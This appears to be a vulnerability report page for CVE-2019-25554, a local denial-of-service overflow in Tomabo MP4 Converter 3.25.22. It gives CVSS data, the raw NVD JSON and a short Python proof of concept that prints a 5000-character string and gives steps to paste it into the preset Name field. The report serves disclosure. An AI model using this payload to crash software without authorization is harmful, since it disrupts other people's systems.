Security Vulnerability Report
CVE-2019-25554 CVSS 5.5 MEDIUM

Published: 2026-03-21 13:16:18
Last Modified: 2026-04-16 17:54:13

Description

Tomabo MP4 Converter 3.25.22 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Name field. Attackers can trigger a buffer overflow by pasting a large payload into the Name parameter when adding a preset in the Video/Audio Formats options, causing the application to crash when Reset All is clicked.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:tomabo:mp4_converter:3.25.22:*:*:*:*:*:*:* - VULNERABLE
Tomabo MP4 Converter 3.25.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2019-25554
# This script generates a payload to trigger the DoS in Tomabo MP4 Converter 3.25.22

def generate_payload(length=5000):
    # Creating a long string of 'A' characters to overflow the buffer
    return "A" * length

if __name__ == "__main__":
    print("Generating payload for CVE-2019-25554...")
    payload = generate_payload(5000)
    print("Payload generated. Copy the string below and paste it into the 'Name' field.")
    print("Then, navigate to the Video/Audio Formats options, add a preset, paste the payload, and click 'Reset All'.")
    print("-" * 50)
    print(payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25554", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:17.857", "lastModified": "2026-04-16T17:54:13.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tomabo MP4 Converter 3.25.22 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Name field. Attackers can trigger a buffer overflow by pasting a large payload into the Name parameter when adding a preset in the Video/Audio Formats options, causing the application to crash when Reset All is clicked."}, {"lang": "es", "value": "Tomabo MP4 Converter 3.25.22 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales bloquear la aplicación al proporcionar una cadena excesivamente larga en el campo Nombre. Los atacantes pueden desencadenar un desbordamiento de búfer al pegar una carga útil grande en el parámetro Nombre al añadir un preajuste en las opciones de Formatos de Video/Audio, lo que provoca que la aplicación falle cuando se hace clic en Restablecer todo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", 
"modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tomabo:mp4_converter:3.25.22:*:*:*:*:*:*:*", "matchCriteriaId": "2113DD5D-E014-4834-8483-962C37A45CA0"}]}]}], "references": [{"url": "http://www.tomabo.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46848", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/tomabo-mp4-converter-denial-of-service-via-name-field", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}